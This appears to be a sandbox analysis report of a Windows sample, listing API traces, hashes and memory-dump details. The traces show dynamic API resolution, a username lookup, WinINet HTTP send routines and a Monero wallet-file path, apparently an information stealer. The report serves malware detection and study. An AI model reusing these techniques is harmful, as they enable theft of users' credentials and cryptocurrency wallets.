                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684713
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 
United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 9c4a41df6e23bdef17765bdd1d265d33d8945b029d2165286119870cf1063b2e
                              • Instruction ID: 90277e5c3365dfb3e78ac40aee84fe76876ace450d49027ea3c058212d0db502
                              • Opcode Fuzzy Hash: 9c4a41df6e23bdef17765bdd1d265d33d8945b029d2165286119870cf1063b2e
                              • Instruction Fuzzy Hash: AA41F3607C6684FEC73CF7A4A84FE9D76575FCBB00F935044E841A6285CFB069404B26

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph (function 684880-684fa2): string setup via call 69a7a0 / call 6847b0 / call 69a740, then InternetOpenA and StrCmpCA; on success InternetConnectA, HttpOpenRequestA, request body assembly (lstrlen, call 69aad0), HttpSendRequestA, an InternetReadFile loop (684e32-684e5c) and InternetCloseHandle; failure paths go through InternetCloseHandle at 684ebe and 684ecb; edge list omitted, rendered graph not recoverable from text.
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                                • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00684915
                              • StrCmpCA.SHLWAPI(?,0148E838), ref: 0068493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00684ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006A0DDB,00000000,?,?,00000000,?,",00000000,?,0148E8A8), ref: 00684DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00684E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00684E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00684E49
                              • InternetCloseHandle.WININET(00000000), ref: 00684EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00684EC5
                              • HttpOpenRequestA.WININET(00000000,0148E7A8,?,0148DF30,00000000,00000000,00400100,00000000), ref: 00684B15
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • InternetCloseHandle.WININET(00000000), ref: 00684ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 7ac2fbebc63bd5802c71d420feddee217f22b94d9f6d2cf1db2d882883a0bcb6
                              • Instruction ID: 1e9272e0a36d166422f7eb91f374de04df4d18a0dada76f0fdc1716fc02316af
                              • Opcode Fuzzy Hash: 7ac2fbebc63bd5802c71d420feddee217f22b94d9f6d2cf1db2d882883a0bcb6
                              • Instruction Fuzzy Hash: 6912E971921118AADF54EB90DD92FEEB3BEBF15300F50419DB10662491EF702E49CFAA
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: d21666ad70c3238a244bbb6f98da01a8c6251b05e34cc1adcbb1621028841625
                              • Instruction ID: d0f13dbc10b9badc13b40dbe5546ec74484ece50901d10e400492ba806b8e903
                              • Opcode Fuzzy Hash: d21666ad70c3238a244bbb6f98da01a8c6251b05e34cc1adcbb1621028841625
                              • Instruction Fuzzy Hash: 8CF04FB1944208ABCB04DF99DD4AFAEBBBCFB04715F10026AFA05A2680C77915048BA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: d5fbe88888d172d4a4bb7c3888ddf4f9eecd6c369862836c195b7480d4f69ca5
                              • Instruction ID: 44cf5ee2f88dbaa916132db9e137101b0d4ad597031a064159f15f0a3dcaea39
                              • Opcode Fuzzy Hash: d5fbe88888d172d4a4bb7c3888ddf4f9eecd6c369862836c195b7480d4f69ca5
                              • Instruction Fuzzy Hash: F6D05E7490030CDBCB04EFE0DC8DADDBB78FB08315F000694D94562340EA305482CBA6

                               Control-flow Graph (rendered graph not included in this export; legend: Executed / Not Executed)
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,01475E50), ref: 00699C2D
                              • GetProcAddress.KERNEL32(74DD0000,01475E30), ref: 00699C45
                              • GetProcAddress.KERNEL32(74DD0000,01489658), ref: 00699C5E
                              • GetProcAddress.KERNEL32(74DD0000,01489670), ref: 00699C76
                              • GetProcAddress.KERNEL32(74DD0000,014896B8), ref: 00699C8E
                              • GetProcAddress.KERNEL32(74DD0000,014896D0), ref: 00699CA7
                              • GetProcAddress.KERNEL32(74DD0000,0147BCE8), ref: 00699CBF
                              • GetProcAddress.KERNEL32(74DD0000,0148CE10), ref: 00699CD7
                              • GetProcAddress.KERNEL32(74DD0000,0148D0C8), ref: 00699CF0
                              • GetProcAddress.KERNEL32(74DD0000,0148CE28), ref: 00699D08
                              • GetProcAddress.KERNEL32(74DD0000,0148CF18), ref: 00699D20
                              • GetProcAddress.KERNEL32(74DD0000,01475C30), ref: 00699D39
                              • GetProcAddress.KERNEL32(74DD0000,01475B10), ref: 00699D51
                              • GetProcAddress.KERNEL32(74DD0000,01475DB0), ref: 00699D69
                              • GetProcAddress.KERNEL32(74DD0000,01475B30), ref: 00699D82
                              • GetProcAddress.KERNEL32(74DD0000,0148CF60), ref: 00699D9A
                              • GetProcAddress.KERNEL32(74DD0000,0148CF00), ref: 00699DB2
                              • GetProcAddress.KERNEL32(74DD0000,0147BD60), ref: 00699DCB
                              • GetProcAddress.KERNEL32(74DD0000,01475C70), ref: 00699DE3
                              • GetProcAddress.KERNEL32(74DD0000,0148CFC0), ref: 00699DFB
                              • GetProcAddress.KERNEL32(74DD0000,0148D020), ref: 00699E14
                              • GetProcAddress.KERNEL32(74DD0000,0148CF30), ref: 00699E2C
                              • GetProcAddress.KERNEL32(74DD0000,0148CE88), ref: 00699E44
                              • GetProcAddress.KERNEL32(74DD0000,01475C90), ref: 00699E5D
                              • GetProcAddress.KERNEL32(74DD0000,0148D0E0), ref: 00699E75
                              • GetProcAddress.KERNEL32(74DD0000,0148D038), ref: 00699E8D
                              • GetProcAddress.KERNEL32(74DD0000,0148CFD8), ref: 00699EA6
                              • GetProcAddress.KERNEL32(74DD0000,0148D098), ref: 00699EBE
                              • GetProcAddress.KERNEL32(74DD0000,0148D0B0), ref: 00699ED6
                              • GetProcAddress.KERNEL32(74DD0000,0148CE40), ref: 00699EEF
                              • GetProcAddress.KERNEL32(74DD0000,0148CED0), ref: 00699F07
                              • GetProcAddress.KERNEL32(74DD0000,0148CDF8), ref: 00699F1F
                              • GetProcAddress.KERNEL32(74DD0000,0148CE58), ref: 00699F38
                              • GetProcAddress.KERNEL32(74DD0000,0148A270), ref: 00699F50
                              • GetProcAddress.KERNEL32(74DD0000,0148CF78), ref: 00699F68
                              • GetProcAddress.KERNEL32(74DD0000,0148CEA0), ref: 00699F81
                              • GetProcAddress.KERNEL32(74DD0000,01475D10), ref: 00699F99
                              • GetProcAddress.KERNEL32(74DD0000,0148CE70), ref: 00699FB1
                              • GetProcAddress.KERNEL32(74DD0000,014757B0), ref: 00699FCA
                              • GetProcAddress.KERNEL32(74DD0000,0148CEB8), ref: 00699FE2
                              • GetProcAddress.KERNEL32(74DD0000,0148CEE8), ref: 00699FFA
                              • GetProcAddress.KERNEL32(74DD0000,01475A30), ref: 0069A013
                              • GetProcAddress.KERNEL32(74DD0000,014757D0), ref: 0069A02B
                              • LoadLibraryA.KERNEL32(0148CFF0,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A03D
                              • LoadLibraryA.KERNEL32(0148CF48,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A04E
                              • LoadLibraryA.KERNEL32(0148CF90,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A060
                              • LoadLibraryA.KERNEL32(0148D080,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A072
                              • LoadLibraryA.KERNEL32(0148CFA8,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A083
                              • LoadLibraryA.KERNEL32(0148D008,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A095
                              • LoadLibraryA.KERNEL32(0148D050,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A0A7
                              • LoadLibraryA.KERNEL32(0148D068,?,00695CA3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE3), ref: 0069A0B8
                              • GetProcAddress.KERNEL32(75290000,01475990), ref: 0069A0DA
                              • GetProcAddress.KERNEL32(75290000,0148D398), ref: 0069A0F2
                              • GetProcAddress.KERNEL32(75290000,01488F68), ref: 0069A10A
                              • GetProcAddress.KERNEL32(75290000,0148D368), ref: 0069A123
                              • GetProcAddress.KERNEL32(75290000,01475790), ref: 0069A13B
                              • GetProcAddress.KERNEL32(6FCD0000,0147B608), ref: 0069A160
                              • GetProcAddress.KERNEL32(6FCD0000,01475850), ref: 0069A179
                              • GetProcAddress.KERNEL32(6FCD0000,0147B9C8), ref: 0069A191
                              • GetProcAddress.KERNEL32(6FCD0000,0148D320), ref: 0069A1A9
                              • GetProcAddress.KERNEL32(6FCD0000,0148D1B8), ref: 0069A1C2
                              • GetProcAddress.KERNEL32(6FCD0000,014759D0), ref: 0069A1DA
                              • GetProcAddress.KERNEL32(6FCD0000,01475750), ref: 0069A1F2
                              • GetProcAddress.KERNEL32(6FCD0000,0148D308), ref: 0069A20B
                              • GetProcAddress.KERNEL32(752C0000,01475870), ref: 0069A22C
                              • GetProcAddress.KERNEL32(752C0000,014756B0), ref: 0069A244
                              • GetProcAddress.KERNEL32(752C0000,0148D3E0), ref: 0069A25D
                              • GetProcAddress.KERNEL32(752C0000,0148D2A8), ref: 0069A275
                              • GetProcAddress.KERNEL32(752C0000,014757F0), ref: 0069A28D
                              • GetProcAddress.KERNEL32(74EC0000,0147B6F8), ref: 0069A2B3
                              • GetProcAddress.KERNEL32(74EC0000,0147B6A8), ref: 0069A2CB
                              • GetProcAddress.KERNEL32(74EC0000,0148D2D8), ref: 0069A2E3
                              • GetProcAddress.KERNEL32(74EC0000,01475770), ref: 0069A2FC
                              • GetProcAddress.KERNEL32(74EC0000,01475A50), ref: 0069A314
                              • GetProcAddress.KERNEL32(74EC0000,0147B9A0), ref: 0069A32C
                              • GetProcAddress.KERNEL32(75BD0000,0148D338), ref: 0069A352
                              • GetProcAddress.KERNEL32(75BD0000,01475A70), ref: 0069A36A
                              • GetProcAddress.KERNEL32(75BD0000,01488FB8), ref: 0069A382
                              • GetProcAddress.KERNEL32(75BD0000,0148D350), ref: 0069A39B
                              • GetProcAddress.KERNEL32(75BD0000,0148D1D0), ref: 0069A3B3
                              • GetProcAddress.KERNEL32(75BD0000,01475A90), ref: 0069A3CB
                              • GetProcAddress.KERNEL32(75BD0000,01475890), ref: 0069A3E4
                              • GetProcAddress.KERNEL32(75BD0000,0148D380), ref: 0069A3FC
                              • GetProcAddress.KERNEL32(75BD0000,0148D1E8), ref: 0069A414
                              • GetProcAddress.KERNEL32(75A70000,01475970), ref: 0069A436
                              • GetProcAddress.KERNEL32(75A70000,0148D2F0), ref: 0069A44E
                              • GetProcAddress.KERNEL32(75A70000,0148D158), ref: 0069A466
                              • GetProcAddress.KERNEL32(75A70000,0148D3B0), ref: 0069A47F
                              • GetProcAddress.KERNEL32(75A70000,0148D3C8), ref: 0069A497
                              • GetProcAddress.KERNEL32(75450000,01475810), ref: 0069A4B8
                              • GetProcAddress.KERNEL32(75450000,014756D0), ref: 0069A4D1
                              • GetProcAddress.KERNEL32(75DA0000,014758F0), ref: 0069A4F2
                              • GetProcAddress.KERNEL32(75DA0000,0148D260), ref: 0069A50A
                              • GetProcAddress.KERNEL32(6F070000,014759B0), ref: 0069A530
                              • GetProcAddress.KERNEL32(6F070000,014759F0), ref: 0069A548
                              • GetProcAddress.KERNEL32(6F070000,01475830), ref: 0069A560
                              • GetProcAddress.KERNEL32(6F070000,0148D0F8), ref: 0069A579
                              • GetProcAddress.KERNEL32(6F070000,014758B0), ref: 0069A591
                              • GetProcAddress.KERNEL32(6F070000,01475A10), ref: 0069A5A9
                              • GetProcAddress.KERNEL32(6F070000,014758D0), ref: 0069A5C2
                              • GetProcAddress.KERNEL32(6F070000,014756F0), ref: 0069A5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0069A5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0069A607
                              • GetProcAddress.KERNEL32(75AF0000,0148D2C0), ref: 0069A629
                              • GetProcAddress.KERNEL32(75AF0000,01488FC8), ref: 0069A641
                              • GetProcAddress.KERNEL32(75AF0000,0148D110), ref: 0069A659
                              • GetProcAddress.KERNEL32(75AF0000,0148D170), ref: 0069A672
                              • GetProcAddress.KERNEL32(75D90000,01475910), ref: 0069A693
                              • GetProcAddress.KERNEL32(6CFC0000,0148D200), ref: 0069A6B4
                              • GetProcAddress.KERNEL32(6CFC0000,01475710), ref: 0069A6CD
                              • GetProcAddress.KERNEL32(6CFC0000,0148D218), ref: 0069A6E5
                              • GetProcAddress.KERNEL32(6CFC0000,0148D188), ref: 0069A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: d4b34e84065022e7ffa2a3ed557908043b71c11ae208208598f063d6f271b6de
                              • Instruction ID: a6a0f6526888c5f7463c6b466279a0297e02667b5c983ce207251dad48f08205
                              • Opcode Fuzzy Hash: d4b34e84065022e7ffa2a3ed557908043b71c11ae208208598f063d6f271b6de
                              • Instruction Fuzzy Hash: AC624CB550020CAFC34CDFA8FD88D663BF9F78C709B14852AA649C3224D739A851DF56

                               Control-flow Graph (rendered graph not included in this export; legend: Executed / Not Executed)
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                                • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                              • StrCmpCA.SHLWAPI(?,0148E838), ref: 00686303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0148DF30,00000000,00000000,00400100,00000000), ref: 00686385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006863FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0068646D
                              • InternetCloseHandle.WININET(00000000), ref: 006864EF
                              • InternetCloseHandle.WININET(00000000), ref: 006864F9
                              • InternetCloseHandle.WININET(00000000), ref: 00686503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
